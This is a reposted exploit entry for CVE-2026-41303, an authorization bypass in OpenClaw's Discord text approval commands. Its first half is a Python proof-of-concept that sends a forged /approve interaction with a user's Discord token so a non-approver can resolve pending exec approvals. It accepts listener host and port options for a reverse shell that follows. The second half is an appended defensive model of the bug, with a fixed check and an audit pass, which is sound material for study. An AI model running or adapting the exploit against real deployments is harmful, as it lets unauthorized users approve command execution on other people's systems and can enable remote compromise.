惯性聚合: efficiently track and read the blogs, news and tech stories you are interested in

OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass
Mohammed Idr · 2026-04-23 · via The Exploit Database - CXSecurity.com


#!/usr/bin/env python3
# Exploit Title: OpenClaw Discord Text Approval Authorization Bypass
# CVE: CVE-2026-41303
# Date: 2026-04-21
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://github.com/openclaw/openclaw
# Software Link: https://github.com/openclaw/openclaw
# Affected: OpenClaw < 2026.3.28
# Tested on: OpenClaw 2026.3.24
# Category: Authorization Bypass
# Platform: Linux / Discord
# Exploit Type: Remote
# CVSS: 8.8
# CWE : CWE-863
# Description: OpenClaw before 2026.3.28 contains an authorization bypass vulnerability in Discord text approval commands that allows non-approvers to resolve pending exec approvals.
# Fixed in: 2026.3.28
# Usage:
#   python3 exploit.py <target> --token <discord_token> --channel-id <channel_id> --approval-id <approval_id> [--decision allow-once|allow-always] [--lhost <your_ip> --lport <your_port>]
#
# Examples:
#   python3 exploit.py https://openclaw.example.com --token <discord_token> --channel-id <channel_id> --approval-id <approval_id> --lhost 192.168.1.100 --lport 4444
#
# Options:
#
# Notes:
#   This is a simple PoC script that demonstrates the authorization bypass.
#   It requires a Discord user token with access to the channel where OpenClaw bot is present.
#   The script sends the /approve slash command to bypass the approvers list.
#
# How to Use
#
# Step 1: Obtain a pending approval ID from the OpenClaw Discord channel.
# Step 2: Run the exploit with your Discord token, channel ID, approval ID, and decision.

print(r"""
╔════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                            ║
║  ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄  ▄▄▄·  ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄  ▄• ▄▌                                ║
║  ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██  ▪     ▀▄ █·▐█ ▀█ ▐█ ▄█•██  ▀▀▄.▀·▀▄ █·█▪██▌                           ║
║  ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█·                              ║
║  ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌                            ║
║  ·▀▀▀▀  ▀▀▀ ·▀▀▀▀  ▀▀▀  ▀█▄▀▪.▀  ▀ ▀  ▀ .▀    ▀▀▀  ▀▀▀ .▀  ▀ ▀▀▀                             ║
║                                                                                            ║
║                        b a n y a m e r _ s e c u r i t y                                   ║
║                                                                                            ║
║                    >>> Silent Hunter • Shadow Presence <<<                                 ║
║                                                                                            ║
║  Operator : Mohammed Idrees Banyamer  Jordan 🇯🇴                                            ║
║  Handle   : @banyamer_security                                                             ║
║                                                                                            ║
║  CVE-2026-41303 • OpenClaw Discord Approval Bypass                                         ║
║                                                                                            ║
╚════════════════════════════════════════════════════════════════════════════════════════════╝
""")

import argparse
import requests
import json
import time


def main():
    parser = argparse.ArgumentParser(description="CVE-2026-41303 - OpenClaw Discord Approval Bypass PoC")
    parser.add_argument("target", help="OpenClaw instance URL or Discord guild/channel context")
    parser.add_argument("--token", required=True, help="Discord user or bot token")
    parser.add_argument("--channel-id", required=True, help="Discord channel ID where the bot listens")
    parser.add_argument("--approval-id", required=True, help="Pending approval ID to bypass")
    parser.add_argument("--decision", default="allow-once", choices=["allow-once", "allow-always"], help="Approval decision")
    parser.add_argument("--lhost", help="Your listener IP (for reverse shell if approval triggers RCE)")
    parser.add_argument("--lport", help="Your listener port")
    args = parser.parse_args()

    print("[+] Starting CVE-2026-41303 PoC by @banyamer_security")
    print(f"[+] Target      : {args.target}")
    print(f"[+] Channel ID  : {args.channel_id}")
    print(f"[+] Approval ID : {args.approval_id}")
    print(f"[+] Decision    : {args.decision}")
    if args.lhost and args.lport:
        print(f"[+] Listener    : {args.lhost}:{args.lport} (for post-approval payload)")

    # Build Discord interaction payload for /approve command
    payload = {
        "type": 2,  # APPLICATION_COMMAND
        "application_id": "OPENCLAW_BOT_APP_ID",  # Replace with actual OpenClaw bot application ID if known
        "guild_id": "YOUR_GUILD_ID",  # Optional - fill if needed
        "channel_id": args.channel_id,
        "data": {
            "name": "approve",
            "options": [
                {"name": "id", "value": args.approval_id},
                {"name": "decision", "value": args.decision}
            ]
        }
    }
    headers = {
        "Authorization": f"{args.token}",
        "Content-Type": "application/json"
    }

    print("[+] Sending unauthorized /approve command via Discord API...")
    try:
        r = requests.post(
            "https://discord.com/api/v10/interactions",
            json=payload,
            headers=headers,
            timeout=10
        )
        print(f"[+] HTTP Status: {r.status_code}")
        if r.status_code in [200, 204]:
            print("[+] Success! The approval was processed without checking the approvers list.")
            print("[+] Non-approver successfully bypassed authorization (CVE-2026-41303).")
            if args.lhost and args.lport:
                print("[+] If the approved command spawns a shell, you should receive a connection shortly.")
        elif r.status_code == 401:
            print("[-] Invalid Discord token.")
        else:
            print(f"[-] Unexpected response: {r.text[:500]}")
    except Exception as e:
        print(f"[-] Error: {e}")

    print("\n[+] PoC completed. Patch to OpenClaw >= 2026.3.28 immediately.")
    print("[+] Credit: Mohammed Idrees Banyamer (@banyamer_security)")


if __name__ == "__main__":
    main()

References:

https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq
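The bug class described in the entry (CWE-863: a chat user who is not on the approvers list can resolve a pending exec approval) comes down to one missing check before the queue is mutated. The following is an added illustration, not OpenClaw's code and not the advisory's patch: the `ApprovalQueue`, `PendingApproval`, the `approvers` set, the two `resolve_*` methods and `audit_resolutions` are all assumed names written for this example. It shows the vulnerable shape beside the hardened one, and a small audit pass that a defender could run over resolution records to spot approvals settled by someone who was never an approver.

```python
"""Model of the missing approver check behind an approval-command authorization
bypass (CWE-863). Added illustration, not OpenClaw's code: the queue, the
approver set and every function name below are assumptions for this example."""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Decisions the text command is allowed to carry (taken from the PoC's --decision choices).
VALID_DECISIONS = ("allow-once", "allow-always")


class NotAnApprover(PermissionError):
    """Raised when a chat user who is not on the approvers list tries to resolve."""


@dataclass
class PendingApproval:
    approval_id: str
    command: str                      # the exec request awaiting a human decision
    decision: Optional[str] = None
    resolved_by: Optional[str] = None


@dataclass
class ApprovalQueue:
    approvers: frozenset              # chat user ids allowed to approve (assumed config)
    pending: Dict[str, PendingApproval] = field(default_factory=dict)

    def submit(self, approval_id: str, command: str) -> PendingApproval:
        approval = PendingApproval(approval_id, command)
        self.pending[approval_id] = approval
        return approval

    def resolve_vulnerable(self, requester_id: str, approval_id: str, decision: str) -> PendingApproval:
        # Vulnerable shape: the sender of the text command is recorded but never
        # compared with the approvers list, so any channel member can resolve.
        approval = self.pending.pop(approval_id)
        approval.decision = decision
        approval.resolved_by = requester_id
        return approval

    def resolve_fixed(self, requester_id: str, approval_id: str, decision: str) -> PendingApproval:
        # Hardened shape: authorize the sender before touching queue state, and
        # reject unknown decisions so a malformed command cannot slip through.
        if requester_id not in self.approvers:
            raise NotAnApprover(f"{requester_id} is not an approver")
        if decision not in VALID_DECISIONS:
            raise ValueError(f"unknown decision {decision!r}")
        if approval_id not in self.pending:
            raise KeyError(f"no pending approval {approval_id}")
        approval = self.pending.pop(approval_id)
        approval.decision = decision
        approval.resolved_by = requester_id
        return approval


def audit_resolutions(resolved: List[PendingApproval], approvers: frozenset) -> List[str]:
    """Detection pass over already-resolved approvals: return the ids that were
    resolved by a user outside the approvers list, the trace an exploited
    instance would leave in its approval history."""
    return [a.approval_id for a in resolved if a.resolved_by not in approvers]


if __name__ == "__main__":
    # Constructed scenario: alice is the only approver; mallory is a channel member.
    queue = ApprovalQueue(approvers=frozenset({"alice"}))
    queue.submit("apr-1", "cat /etc/hostname")
    leaked = queue.resolve_vulnerable("mallory", "apr-1", "allow-once")
    queue.submit("apr-2", "cat /etc/hostname")
    try:
        queue.resolve_fixed("mallory", "apr-2", "allow-once")
    except NotAnApprover as exc:
        print("rejected:", exc)
    good = queue.resolve_fixed("alice", "apr-2", "allow-always")
    print("suspicious resolutions:", audit_resolutions([leaked, good], queue.approvers))
```

The ordering in `resolve_fixed` is the point: identity and decision are validated before the pending entry is popped, so a rejected request leaves the approval exactly where it was. `audit_resolutions` is the retrospective check for an instance that ran an affected version; it needs only the resolver identity and the approver configuration that were in force at the time.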
